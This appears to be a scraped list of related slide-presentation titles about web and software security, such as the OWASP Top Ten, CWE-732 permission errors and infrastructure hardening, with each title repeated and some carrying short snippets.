SEC835 OWASP Top Ten Project.
CWE-732 Incorrect Permission Assignment for Critical Resource

CWE-732 Incorrect Permission Assignment for Critical Resource
1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.

1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.
19.1 Silberschatz, Galvin and Gagne ©2003 Operating System Concepts with Java Chapter 19: Security The Security Problem Authentication Program Threats.

19.1 Silberschatz, Galvin and Gagne ©2003 Operating System Concepts with Java Chapter 19: Security The Security Problem Authentication Program Threats.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.

Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
The 10 Most Critical Web Application Security Vulnerabilities

The 10 Most Critical Web Application Security Vulnerabilities
Web Application Security

Web Application Security
D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.

D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.
Secure Software Development Mini Zeng University of Alabama in Huntsville 1.

Secure Software Development Mini Zeng University of Alabama in Huntsville 1.
1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.

1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.
OWASP Zed Attack Proxy Project Lead

OWASP Zed Attack Proxy Project Lead
Security.NET Chapter 1. How Do Attacks Occur? Stages of attack Examples of attacker actions 1. FootprintRuns a port scan on the firewall 2. PenetrationExploits.

Security.NET Chapter 1. How Do Attacks Occur? Stages of attack Examples of attacker actions 1. FootprintRuns a port scan on the firewall 2. PenetrationExploits.
Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.

Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.
The OWASP Way Understanding the OWASP Vision and the Top Ten.

The OWASP Way Understanding the OWASP Vision and the Top Ten.

Similar presentations

Ads by Google